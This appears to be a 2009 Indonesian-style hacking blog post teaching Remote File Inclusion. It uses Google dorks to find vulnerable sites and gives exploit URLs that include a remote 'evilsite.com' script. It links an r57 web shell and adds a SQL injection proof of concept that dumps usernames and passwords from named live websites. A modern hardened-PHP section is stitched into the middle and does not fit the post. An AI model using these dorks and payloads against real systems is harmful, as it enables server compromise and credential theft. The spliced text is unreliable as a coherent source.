Friday, July 31, 2009

RFI

Thank you, my friends, for visiting my blog.

I will explain RFI. RFI (Remote File Inclusion) is one way of penetrating a server through port 80.

Without further ado, let's go straight to practice.


Example:
- Dork <==== a way of finding targets (that is, the keyword we type into a search engine such as Google)
- Vulnerable file <==== a file that contains a security hole

Example
Dork "Powered by MiniCWB"


Vulnerable file :
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php


- From the data above, try typing the dork into Google
- Many websites that have the weakness in those files will appear
- Pick the target website you want (copy its link, do not click it)
- Edit the link of the chosen target


http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]

[evilc0de] is a script placed on a website that we own

An example of a script that I have: http://geocities.com/anggri_yanto/r57.txt

- Don't forget to end it with a question mark so that it gets executed

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

Software : Ultrize TimeSheet version 1.2.2
Vendor : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author : NoGe


=====================================================================================


[o] Vulnerable file


include($config['include_dir'].'timesheet.class.php');

include/timesheet.php



[o] Exploit

http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]


=====================================================================================
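The vulnerable line above builds its include path from `$config['include_dir']`, a value the advisory's URL shows arriving from the query string. A hardened counterpart of that pattern follows as an added example; it is not Ultrize's code or a vendor patch, and `APP_INCLUDE_DIR`, `safe_include()`, `load_language()`, the `lang` parameter and the directory layout are hypothetical.

```php
<?php
// Added example: hardened counterpart of
//   include($config['include_dir'].'timesheet.class.php');
// All names below are hypothetical, not taken from the application.

// 1. The include directory is fixed in code, derived from this file's
//    location. It is never read from $_GET/$_POST/$_COOKIE or from a
//    global that a request could populate.
define('APP_INCLUDE_DIR', __DIR__ . DIRECTORY_SEPARATOR . 'include');

// 2. Resolve the final path and require it to stay inside APP_INCLUDE_DIR.
function safe_include(string $file): void
{
    $base = realpath(APP_INCLUDE_DIR);
    $path = realpath(APP_INCLUDE_DIR . DIRECTORY_SEPARATOR . $file);
    // realpath() returns false for URLs and for files that do not exist,
    // and collapses any "../" sequences before the prefix comparison.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(400);
        exit('Invalid include');
    }
    require $path;
}

// 3. A request-selected value (here a language code) is mapped through an
//    allow-list; the request never supplies any part of the path itself.
function load_language(string $requested): void
{
    $allowed = ['en', 'hu', 'no', 'ro', 'ru'];   // constructed sample list
    $lang = in_array($requested, $allowed, true) ? $requested : 'en';
    safe_include('language' . DIRECTORY_SEPARATOR . $lang . '.inc.php');
}

safe_include('timesheet.class.php');

// Reject non-string input (e.g. lang[]=x) before it reaches the typed function.
$lang = $_GET['lang'] ?? 'en';
load_language(is_string($lang) ? $lang : 'en');
```

Keeping `allow_url_include = Off` in php.ini (its default) blocks URL wrappers in `include`/`require` as a second layer behind the code fix.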

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

#################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

- Vulnerable code is everywhere

- PoC's

http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt

http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt

##################################################################################################################

# milw0rm.com [2009-07-30]

linkSpheric 0.74 Beta 6 SQL Injection Vuln

Thursday, July 31, 2009

[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Reference: NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"
